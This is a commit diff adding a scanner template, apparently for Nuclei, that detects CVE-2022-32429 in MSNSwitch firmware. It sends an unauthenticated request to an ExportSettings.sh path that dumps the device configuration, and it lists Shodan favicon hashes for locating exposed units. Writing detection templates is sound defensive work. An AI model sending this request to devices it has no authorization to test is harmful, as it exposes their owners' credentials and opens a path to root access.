commit
c088afb382
|
@ -0,0 +1,41 @@
|
||||||
|
id: CVE-2022-32429
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MSNSwitch Firmware MNT.2408 - Configuration Dump
|
||||||
|
author: theabhinavgaur
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The vulnerability is an authentication bypass which allows the full configuration of the unit to be downloaded. The credentials obtained here can then be used via a local subnet vulnerability to obtain a full root shell on the device.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
|
||||||
|
- https://elifulkerson.com/CVE-2022-32429/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32429
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2022-32429
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
|
||||||
|
tags: cve,cve2022,msmswitch,unauth,switch,config,dump
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "SSID1"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- 'filename="Settings(.*).dat'
|
||||||
|
- 'application/octet-stream'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue